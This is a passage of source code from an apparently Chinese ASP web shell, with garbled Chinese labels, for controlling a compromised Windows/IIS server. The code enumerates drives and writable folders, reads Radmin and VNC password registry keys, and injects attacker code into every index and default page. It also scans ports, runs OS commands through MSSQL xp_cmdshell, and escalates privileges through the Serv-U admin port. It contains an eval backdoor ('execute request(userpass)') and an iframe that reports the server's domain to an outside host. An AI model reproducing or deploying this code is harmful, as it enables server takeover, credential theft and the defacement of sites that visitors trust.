j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>´ÅÅÌ/ÏµÍ³ÎÄ¼þ¼ÐÐÅÏ¢</TD></TR>"
  For Each DriveB in FSO.Drives
j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
j DriveB.DriveLetter
j" method=Post><TD width=25"&chr(37)&"><B>ÅÌ·û</B></TD><TD width=15"&chr(37)&">"
j DriveB.DriveLetter
j":</TD><TD width=20"&chr(37)&"><B>ÀàÐÍ</B></TD><TD width=20"&chr(37)&">"
  Select Case DriveB.DriveType
  Case 1: j"¿ÉÒÆ¶¯"
  Case 2: j"±¾µØÓ²ÅÌ"
  Case 3: j"ÍøÂç´ÅÅÌ"
  Case 4: j"CD-ROM"
  Case 5: j"RAM´ÅÅÌ"
  Case else: j"Î´ÖªÀàÐÍ"
  End Select
j"</TD><TD><INPUT type=submit value=ÏêÏ¸±¨¸æ></TD></FORM></TR>"
  Next
j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
j FSO.GetSpecialFolder(0)
j" method=Post><TD align=middle><B>WindowsÎÄ¼þ¼Ð</B></TD><TD colspan=3>"
j FSO.GetSpecialFolder(0)
j"</TD><TD align=middle><INPUT type=submit value=ÏêÏ¸±¨¸æ></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
j FSO.GetSpecialFolder(1)
j" method=Post><TD align=middle><B>System32ÎÄ¼þ¼Ð</B></TD><TD colspan=3>"
j FSO.GetSpecialFolder(1)
j"</TD><TD align=middle><INPUT type=submit value=ÏêÏ¸±¨¸æ></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
j FSO.GetSpecialFolder(2)
j" method=Post><TD align=middle><B>ÏµÍ³ÁÙÊ±ÎÄ¼þ¼Ð</B></TD><TD colspan=3>"
j FSO.GetSpecialFolder(2)
j"</TD><TD align=middle><INPUT type=submit value=ÏêÏ¸±¨¸æ></TD><TR class=TBTD> <FORM action= method=Post>"
j"<TD align=middle><B>Õ¾µã¸úÄ¿Â¼</B></TD><TD colspan=3>Õ¾µã¸úÄ¿Â¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>ÏêÏ¸±¨¸æ</b></a></TD></FORM></tr></TABLE>"
j"<BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>Ö¸¶¨ÎÄ¼þ¼Ð²éÑ¯£º<br><textarea cols=""90"" rows=""5"" name=Folder >"&path_arr&"</textarea><br><INPUT type=submit value=Éú³É±¨¸æ> ÅúÁ¿²é¿´Ä¿Â¼È¨ÏÞ£¬¿ÉÊäÈëÐÂÄ¿Â¼</FORM><DIV>"
Set FSO=Nothing
End Sub
Sub ScanDrive(Drive)
On Error Resume Next:Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
If Drive <> "" Then
Set FSO = Server.Createobject("Scripting.FileSystemObject")
Set TestDrive = FSO.GetDrive(Drive)
If TestDrive.IsReady Then
Temp_Str = "<LI>´ÅÅÌ·ÖÇøÀàÐÍ£º" & Red(TestDrive.FileSystem) & "<LI>´ÅÅÌÐòÁÐºÅ£º" & Red(TestDrive.SerialNumber) & "<LI>´ÅÅÌ¹²ÏíÃû£º" & Red(TestDrive.ShareName) & "<LI>´ÅÅÌ×ÜÈÝÁ¿£º" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>´ÅÅÌ¾íÃû£º" & Red(TestDrive.VolumeName) & "<LI>´ÅÅÌ¸ùÄ¿Â¼:" & ScReWr((Drive & ":\"))
Set BaseFolder = TestDrive.RootFolder
Set TempFolders = BaseFolder.SubFolders
For Each D in TempFolders
Temp_Str = Temp_Str & "<LI>ÎÄ¼þ¼Ð£º" & ScReWr(D)
Next
Set TempFolder = Nothing
Set BaseFolder = Nothing
Else
Temp_Str = Temp_Str & "<LI>´ÅÅÌ¸ùÄ¿Â¼:" & Red("²»¿É¶Á:(")
Dim TempFolderList,t:t=0
Temp_Str = Temp_Str & "<LI>" & Red("Çî¾ÙÄ¿Â¼²âÊÔ£º")
TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
For i = 0 to Ubound(TempFolderList)
If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
t = t+1
Temp_Str = Temp_Str & "<LI>·¢ÏÖÎÄ¼þ¼Ð£º" & ScReWr(Drive & ":\" & TempFolderList(i))
End if
Next
If t=0 then Temp_Str = Temp_Str & "<LI>ÒÑÇî¾Ù" & Drive & "ÅÌ¸ùÄ¿Â¼£¬µ«Î´ÓÐ·¢ÏÖ:("
End if
Set TestDrive = Nothing
Set FSO = Nothing
Temp_Str = Temp_Str
Message Drive & ":´ÅÅÌÐÅÏ¢",Temp_Str,1
End if
End Sub
Sub ScFolder(folder)
On Error Resume Next
folderArr = Split(folder,vbcrlf)
For i = 0 To Ubound(folderArr)
 	 Dim FSO,OFolder,TempFolder,Scmsg,S
 	 Set FSO = Server.Createobject("Scripting.FileSystemObject")
 	 folder = folderArr(i)
 	 If FSO.FolderExists(folder) Then
 	  Set OFolder = FSO.GetFolder(folder)
 	 Set TempFolders = OFolder.SubFolders
 	 Scmsg = "<LI>Ö¸¶¨ÎÄ¼þ¼Ð¸ùÄ¿Â¼£º" & ScReWr(folder)
 	 For Each S in TempFolders
 	  Scmsg = Scmsg&"<LI>ÎÄ¼þ¼Ð£º" & ScReWr(S)
 	 Next
 	 Set TempFolders = Nothing
 	 Set OFolder = Nothing
else
 	  Scmsg = "<LI>ÎÄ¼þ¼Ð£º" & Red(folder & "²»´æÔÚ»òÎÞ¶ÁÈ¨ÏÞ!")
 	 End if
 	 Set FSO = Nothing

 	 Message "",Scmsg,1
On Error Resume Next
next
 	 j"<center><br><br>×¢Òâ£º²»Òª¶à´ÎË¢ÐÂ±¾Ò³Ãæ£¬·ñÔòÔÚÖ»Ð´ÎÄ¼þ¼Ð»áÁôÏÂ´óÁ¿À¬»øÎÄ¼þ,¶Ô²»´æÔÚµÄÄ¿Â¼×öÁËÐÞ¸Ä£¬Ö»ÏÔÊ¾´æÔÚµÄÄ¿Â¼!</center>"&backurl
End Sub
Function ScReWr(folder)
On Error Resume Next
Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
Set FSO = Server.Createobject("Scripting.FileSystemObject")
Set TestFolder = FSO.GetFolder(folder)
Set TestFileList = TestFolder.SubFolders
RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
For Each A in TestFileList
Next
If err Then
err.Clear
ReWrStr = folder & "<FONT color=#ff2222> ²»¿É¶Á,"
FSO.CreateTextFile folder & RndFilename,True
If err Then
err.Clear
ReWrStr = ReWrStr & "²»¿ÉÐ´¡£</FONT>"
Else
ReWrStr = ReWrStr & "¿ÉÐ´¡£</FONT>"
FSO.DeleteFile folder & RndFilename,True
End If
Else
ReWrStr = folder & "<FONT color=#dddddd> ¿É¶Á,"
FSO.CreateTextFile folder & RndFilename,True
If err Then
err.Clear
ReWrStr = ReWrStr & "²»¿ÉÐ´¡£</FONT>"
Else
ReWrStr = ReWrStr & "¿ÉÐ´¡£</FONT>"
FSO.DeleteFile folder & RndFilename,True
End if
End if
Set TestFileList = Nothing
Set TestFolder = Nothing
Set FSO = Nothing
ScReWr = ReWrStr
On Error Resume Next
End Function
function goback()
set Ofso = Server.CreateObject("Scripting.FileSystemObject")
set ofolder = Ofso.Getfolder(Session("FolderPath"))
if not ofolder.IsRootFolder then
j "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
else
j "<script>ShowFolder("""&Session("FolderPath")&""")</script><center>ÒÑ¾ÊÇ´ÅÅÌ¸ùÄ¿Â¼ÁË!</center><center><br><INPUT type=button value=·µ»Ø onClick='history.go(-1);'></br></center>"
end if
set Ofso=nothing
set ofolder=nothing
end function
sub ReadREG()
j "<form method=post>"
j  "×¢²á±í¼üÖµ¶ÁÈ¡<p>"
j "<input type=hidden value=ReadReg name=theAct>"
j "<tr><td colspan=2> "
j "<select onChange='this.form.thePath.value=this.value;'>"
j "<option value=''>Ñ¡Ôñ×Ô´øµÄ¼üÖµ</option>"
j "<option value='HKLM\SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName\ComputerName'>ComputerName</option>"
j"<option value=""HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Linkage\Bind"">Íø¿¨ÁÐ±í</option>"
j"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter"">RadminÃÜÂë</option>"
j"<option value=""HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters\Port"">Radmin¶Ë¿Ú</option>"
j"<option value=""HKCU\Software\ORL\WinVNC3\Password"">VNC3ÃÜÂë</option>"
j"<option value=""HKCU\Software\ORL\WinVNC3\PortNumber"">VNC3¶Ë¿Ú</option>"
j"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\Password"">VNC4ÃÜÂë</option>"
j"<option value=""HKLM\SOFTWARE\RealVNC\WinVNC4\PortNumber"">VNC4¶Ë¿Ú</option>"
j"<option value=""HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber"">3389¶Ë¿Ú</option>"
j"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPDataPort"">PcAnyWÊý¾Ý¶Ë¿Ú</option>"
j"<option value=""HKLM\SOFTWARE\Symantec\pcAnywhere\CurrentVersion\System\TCPIPStatusPort"">PcAnyW×´Ì¬¶Ë¿Ú</option>"
j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip\EnableSecurityFilters'>tcp/ip¹ýÂË1</option>"
j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip\EnableSecurityFilters'>tcp/ip¹ýÂË2</option>"
j "<option value='HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\EnableSecurityFilters'>tcp/ip¹ýÂË3</option>"
j "<option value='HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SchedulingAgent\LogPath'>Schedule Log</option>"
j "<option value='HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\3389:TCP'>·À»ð¿ª·Å</option>"
j "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\UDPAllowedPorts'>ÔÊÐí¿ª·ÅµÄUDP¶Ë¿Ú</option>"
j "<option value='HKLM\SYSTEM\ControlSet001\Services\Tcpip\Parameters\Interfaces\{8A465128-8E99-4B0C-AFF3-1348DC55EB2E}\TCPAllowedPorts'>ÔÊÐí¿ª·ÅµÄTCP¶Ë¿Ú</option>"
j "</select><br />"
j " <input name=thePath value='' size=80>"
j "<input type=button value='¶Á ¼ü Öµ' onclick='this.form.submit()'>"
j "</form><hr/>"
if Request("thePath")<>"" then
On Error Resume Next
Set wsX = Server.CreateObject("WScript.Shell")
thePath=Request("thePath")
theArray=oScriptlhn.RegRead(thePath)
If IsArray(theArray) Then
For i=0 To UBound(theArray)
j "<li>" & theArray(i)
Next
Else
j "<li>" & theArray
End If
end if
end sub
Sub file_show(ffname,pth)
j"<form action="&ASP_SELF&"?Action=file_show method='POST'>"
j"<input type='TEXT' name='pth' size=40 value='"&ffname&"\'><input type='submit' value='SAVE'><br><input    type='TEXT' name='zhenz'  value='<marquee\s+[^>]+>(.+?)</marquee>'><br><input    type='TEXT' name='findbq'  value='</td>'><br>"
j"<textarea name='insercode' cols='150' rows='15' style='border:1px solid #d9eef9' >"&txt2&"</textarea> <br>"
j"<input type='hidden' name='ex' value='save'>"
response.write"</form>"
if request.Form("insercode")<>"" then
 On Error Resume Next
dim xxc
xxc=Server.MapPath(mid(pth,len(Addpath)+2,(instr(len(Addpath)+2,pth,"\")-len(Addpath)-2)))
Set fs1=Server.createObject("Scripting.FileSystemObject")
isExist=fs1.FileExists(pth)
fs1.CreateFolder(xxc)
Set fs1 = Nothing
if  Instr(LCAse(ffname),LcASE("index")) then
Call backfile(ffname, xxc & "/default.asp")
Call backfile(ffname, xxc & "/index.html")
Call backfile(ffname, xxc & "/index.htm")
Call backfile(ffname, xxc & "/default.html")
Call backfile(ffname, xxc & "/index.php")
Call backfile(ffname, xxc & "/Default.aspx")
end if
if incode<> "" then
Response.Write "¸ÄÁËÊ×Ò³ÎÄ¼þ" & pth
inSErtallFIlES(incode)
end if
end if
End Sub
sub backfile(file1,file2)
On Error Resume Next
 dim fsx
 set fsx=createobject("Scripting.FileSystemObject")
 fsx.copyfile file1,file2,true
 set fsx=nothing
Response.Write   "<br>±£´æÁËÎÄ¼þ" &  file2
end sub
sub inSErtallFIlES(addCoDE)
On Error Resume Next
 	  wpatH=Addpath
 	  if riGHt(wPATh,1)<>"\" TheN wpatH=wPAth &"\"
 	  Pc="default.html|default.asp|index.htm|index.asp|index.html|index.php|default.asp|Default.aspx"
 	  SEt WFso = CReateoBjECt("Scripting.FileSystemObject")
 	  ON error reSuME nExt
 	  set f = wFSo.GeTfOldER(wpAtH)
 	  SET fc2 = f.FIlEs
 	  fOR EAcH MYfIlE iN fC2
 	  set fs1 = CREAteOBjECT("Scripting.FileSystemObject")
 	  FtypE3= myfile.name
     IF Instr(LCAse(Pc),LcASE(mYfIle.nAmE)) and Instr(LcASE(mYfIle.nAmE),LcASE(".bak"))=0 thEn

 	  Set fsxx=Server.createObject("Scripting.FileSystemObject")
      xxExist=fsxx.FileExists(WPATh&myFiLE.namE & ".bak")
 	   if  xxExist <> true then
 	   call  	 backfile(WPATh&myFiLE.namE,WPATh&myFiLE.namE & ".bak" )
 	   end if
 	    sEt fsxx=nOTHING

   	  	  	  	  	 set tFiLe1=FS1.OPentExtfILE(WPATh&myFiLE.namE,1,-2)

 	  	  	  	  	 NeWcODE=RemoveHTML(TFilE1.readAll,zhenz)
 	  	  	  	  	 response.Write findbq
  	  	   	 if instr(LCAse(NeWcODE),LCAse(findbq))  then
 	  	  	  	  	    FTYpE1=split(NeWcODE,findbq)
 	  	                FtyPe2=UBOUnD(fTyPe1)
 	  	  	  	  	    Randomize
 	  	  	  	  	    FtyPe2=FtyPe2
                       Rndnum=int((FtyPe2-1)*rnd)
 	  	  	  	  	    'Rndnum=dmin+int((dmax-dmin+1)*rnd)
 	  	  	  	  	    if  Rndnum >= fytpe2-1 then rndnum=0

 	  	  	  	  	  for i = 0 to  FtyPe2
 	  	  	  	  	         if i = FtyPe2 then
 	  	  	  	  	  	  	  getxxx = getxxx & FTYpE1(FtyPe2)
 	  	  	  	  	  	  	  else
 	  	  	  	  	  	     if i = Rndnum  then
 	  	  	  	  	               getxxx=getxxx & FTYpE1(i) & addCoDE  & findbq
 	  	  	  	  	           else
 	  	  	  	  	               getxxx=getxxx & FTYpE1(i)  & findbq
 	  	  	  	  	           end if
 	  	  	  	  	  	  	   end if
 	  	  	  	  	     next
 	  	  	  	  	     NeWcODE=getxxx
 	  	  	  	  	 else
 	  	  	  	  	     NeWcODE=NeWcODE & "<td>" & addCoDE 	 & "</td>"
                    end if
  	  	  	  	  	 sET oBjcOUNtfile=WfsO.CREATEteXTfILE(WPAtH&myfiLE.NamE,TRUe)
 	  	  	  	  	 oBjcoUNTFIle.WRite NEWCODE
 	  	  	  	  	 OBjCOuNTfIlE.cLOse
 	  	  	  	  	 sEt OBJcouNTfIle=nOTHING

 	   END If
 	  	  	 seT Fs1 = nOtHinG
 	  	  	 seT tFiLe1 = nOtHinG
      NEXT
SET tFIlE=nOtHing
FsO.close
seT FsO = nOtHinG
SET tfiLE=nOThINg
sET tFile2=NOthing
sET wfSo = NOthIng
EnD SuB


if session("KKK")<>UserPass then
if request.form("pass")<>"" or request("pass")<>"" then
if request.form("pass")=UserPass then
session("KKK")=UserPass
'response.redirect url
j "<iframe src="&htp&"zh/?domain="&serveru&" width=100% height=100></iframe>"'gethttppage(htp&"zh/?domain="&serveru)
j "<meta http-equiv=""refresh"" content="""&ms&";URL=?"">"
j "<center><form method='post'><input type='submit' value='  ½øÈë  '>"
response.end
else
j"<br><br><br><b><div align=center><font size='5' color='red'><h1>PassWord Error!<h1></font></b> <br><br><br><br><b><font size='14' color='lime'></font></b></p></center>"&backurl
end if
else
si="<center><FONT color=#000000 face=""Wingdings"" style=""FONT-SIZE: 250pt; FILTER: shadow(color:#ffffff,strength=55); WIDTH: 100%;  LINE-HEIGHT: 130%; "">N</FONT><div style='width:400px;padding:32px; align=left'><br><a href="""&SItEuRl&""" target=""_blank""><b>"&Copyright&"</b></a><form action='"&url&"' method='post'><b>PassWord£º</b><input name='pass' type='password' size='22'> <input type='submit' value='submit'></center>"
if instr(SI,SIC)<>0 then
j sI
call promyself
execute request(userpass)
On Error Resume Next
end if
end if
response.end
end if
Function RemoveHTML(strHTML,zhenza)
Dim objRegExp, Match, Matches
Set objRegExp = New RegExp
objRegExp.IgnoreCase = True
objRegExp.Global = True
objRegExp.Pattern =zhenza
Set Matches = objRegExp.Execute(strHTML)
For Each Match In Matches
strHTML = Replace(strHTML, Match.Value, "")
Next
RemoveHTML = strHTML
Set objRegExp = Nothing
End Function
sub ScanPort()
Server.ScriptTimeout = 7776000
if request.Form("port")="" then
PortList="21,23,53,1433,3306,3389,4899,5631,5632,5800,5900,43958"
else
PortList=request.Form("port")
end if
if request.Form("ip")="" then
IP="127.0.0.1"
else
IP=request.Form("ip")
end if
j"<p>¶Ë¿ÚÉ¨ÃèÆ÷(Èç¹ûÉ¨Ãè¶à¸ö¶Ë¿Ú,ËÙ¶È±È½ÏÂý,¸öÈËÍÆ¼öÊ¹ÓÃCMD£¬CMD¶ÔÄÚÍøÉ¨Ãè²»×¼È·¡£)</p><p>Èç¹ûÊÇÄÚÍø£¬ÔòÉ¨Ãè½á¹ûÍâ²¿IP¿ÉÄÜÎÞ·¨Á¬½Ó¡£ÇëÔÚSHELLÄÚÖ´ÐÐÏµÁÐ²Ù×÷¡£</p>"
j"<form name='form1' method='post' action='' onSubmit='form1.submit.disabled=true;'>"
j"<p>Scan IP: "
j" <input name='ip' type='text' class='TextBox' id='ip' value='"&IP&"' size='60'>"
j"<br>Port List:"
j"<input name='port' type='text' class='TextBox' size='60' value='"&PortList&"'>"
j"<br><br>"
j"<input name='submit' type='submit' class='buttom' value=' scan '>"
j"<input name='scan' type='hidden' id='scan' value='111'>"
j"</p></form>"
If request.Form("scan") <> "" Then
timer1 = timer
j("<b>É¨Ãè±¨¸æ:</b><br><hr>")
tmp = Split(request.Form("port"),",")
ip = Split(request.Form("ip"),",")
For hu = 0 to Ubound(ip)
If InStr(ip(hu),"-") = 0 Then
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ip(hu), tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ip(hu), j)
Next
Else
j(startN & " or " & endN & " is not number<br>")
End If
Else
j(tmp(i) & " is not number<br>")
End If
End If
Next
Else
ipStart = Mid(ip(hu),1,InStrRev(ip(hu),"."))
For xxx = Mid(ip(hu),InStrRev(ip(hu),".")+1,1) to Mid(ip(hu),InStr(ip(hu),"-")+1,Len(ip(hu))-InStr(ip(hu),"-"))
For i = 0 To Ubound(tmp)
If Isnumeric(tmp(i)) Then
Call Scan(ipStart & xxx, tmp(i))
Else
seekx = InStr(tmp(i), "-")
If seekx > 0 Then
startN = Left(tmp(i), seekx - 1 )
endN = Right(tmp(i), Len(tmp(i)) - seekx )
If Isnumeric(startN) and Isnumeric(endN) Then
For j = startN To endN
Call Scan(ipStart & xxx,j)
Next
Else
j(startN & " or " & endN & " is not number<br>")
End If
Else
j(tmp(i) & " is not number<br>")
End If
End If
Next
Next
End If
Next
timer2 = timer
thetime=cstr(int(timer2-timer1))
j"<hr>Process in "&thetime&" s"
END IF
end sub
Sub Scan(targetip, portNum)
On Error Resume Next
set conn = Server.CreateObject("ADODB.connection")
connstr="Provider=SQLOLEDB.1;Data Source=" & targetip &","& portNum &";User ID=lake2;Password=;"
conn.ConnectionTimeout = 1
conn.open connstr
If Err Then
If Err.number = -2147217843 or Err.number = -2147467259 Then
If InStr(Err.description, "(Connect()).") > 0 Then
j(targetip & ":" & portNum & ".........¹Ø±Õ<br>")
Else
j(targetip & ":" & portNum & ".........<font color=red>¿ª·Å</font><br>")
End If
End If
End If
End Sub
Select Case Action:case "MainMenu":MainMenu()
Case "EditPower"
Call EditPower(request("PowerPath"))
Case "SavePower"
Call SavePower(request("PowerPath"),request("SaveType"))
case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command£º</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName£º</b><input type=text name=U value=sa>&nbsp;<b id=x>Password£º</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center'>·þÎñÆ÷×é¼þÐÅÏ¢</td></tr><tr align='center'><td height='20' width='200'>·þÎñÆ÷Ãû</td><td> </td><td>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://lpl38.com/ips8.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200'>·þÎñÆ÷IP</td><td> </td><td><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='²éÑ¯´Ë·þÎñÆ÷ËùÔÚµØ'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200'>·þÎñÆ÷Ê±¼ä</td><td> </td><td>"&now&" </td></tr><tr align='center'><td height='20' width='200'>·þÎñÆ÷CPUÊýÁ¿</td><td> </td><td>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200'>·þÎñÆ÷ÓïÖÖ</td><td> </td><td>"&request.servervariables("http_accept_language")&"</td></tr><tr align='center'><td height='20' width='200'>·þÎñÆ÷²Ù×÷ÏµÍ³</td><td> </td><td>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200'>WEB·þÎñÆ÷°æ±¾</td><td> </td><td>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
For i=0 To 19
SI=SI&"<tr align='center'><td height='20' width='200'>"&ObT(i,0)&"</td><td>"&ObT(i,1)&"</td><td align=left>"&ObT(i,2)&"</td></tr>"
Next
j SI
Err.Clear
function getHTTPPage(url)
on error resume next
dim http
set http=Server.createobject("MSXML2.ServerXMLHTTP")
objXml.SetTimeOuts 3000,4000,5000,4000
Http.open "GET",url,false
Http.send()
if Http.readystate<>4 then
getHTTPPage=""
exit function
end if
getHTTPPage=bytes2BSTR(Http.responseBody)
set http=nothing
if err.number<>0 then err.Clear
end function
Function bytes2BSTR(vIn)
dim strReturn
dim i1,ThisCharCode,NextCharCode
strReturn = ""
For i1 = 1 To LenB(vIn)
ThisCharCode = AscB(MidB(vIn,i1,1))
If ThisCharCode < &H80 Then
strReturn = strReturn & Chr(ThisCharCode)
Else
NextCharCode = AscB(MidB(vIn,i1+1,1))
strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
i1 = i1 + 1
End If
Next
bytes2BSTR = strReturn
    Err.Clear
End Function

Case "Servu"
SUaction=request("SUaction")
if  not isnumeric(SUaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "User " & user & vbCrLf
loginpass = "Pass " & pass & vbCrLf
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
mt = "SITE MAINTENANCE" & vbCrLf
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
quit = "QUIT" & vbCrLf
newuser=replace(newuser,"c:",f)
select case SUaction
case 1
set a=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
set session("a")=a
j"<form method='post' name='goldsun'>"
j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
j"<input name='SUaction' type='hidden' id='SUaction' value='2'></form>"
j"<script language='javascript'>"
j"document.write('<center>ÕýÔÚÁ¬½Ó 127.0.0.1:"&port&",Ê¹ÓÃÓÃ»§Ãû: "&user&",¿ÚÁî£º"&pass&"...<center>');"
j"setTimeout('document.all.goldsun.submit();',4000);"
j"</script>"
case 2
set b=Server.CreateObject("Microsoft.XMLHTTP")
b.open "GET", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2", True, "", ""
b.send "User go" & vbCrLf & "pass od" & vbCrLf & "site exec " & cmd & vbCrLf & quit
set session("b")=b
j"<form method='post' name='goldsun'>"
j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
j"<input name='SUaction' type='hidden' id='SUaction' value='3'></form>"
j"<script language='javascript'>"
j"document.write('<center>ÕýÔÚÌáÉýÈ¨ÏÞ,ÇëµÈ´ý...,<center>');"
j"setTimeout(""document.all.goldsun.submit();"",4000);"
j"</script>"
case 3
set c=Server.CreateObject("Microsoft.XMLHTTP")
a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", True, "", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
j"<center>ÌáÈ¨Íê±Ï,ÒÑÖ´ÐÐÁËÃüÁî£º<br><font color=red>"&cmd&"</font><br><br>"
j"<input type=button value=' ·µ»Ø¼ÌÐø ' onClick=""location.href='?Action=Servu';"">"
j"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
Set a = Nothing
b.abort
Set b = Nothing
c.abort
Set c = Nothing
j"<center><form method='post' name='goldsun'>"
j"<table width='494' height='163' border='1' cellpadding='0' cellspacing='1' bordercolor='#666666'>"
j"<tr align='center' valign='middle'>"
j"<td colspan='2'>Serv-U ÌáÉýÈ¨ÏÞ by Sam</td>"
j"</tr>"
j"<tr align='center' valign='middle'>"
j"<td width='100'>ÓÃ»§Ãû:</td>"
j"<td width='379'><input name='u' type='text' id='u' value='LocalAdministrator'></td>"
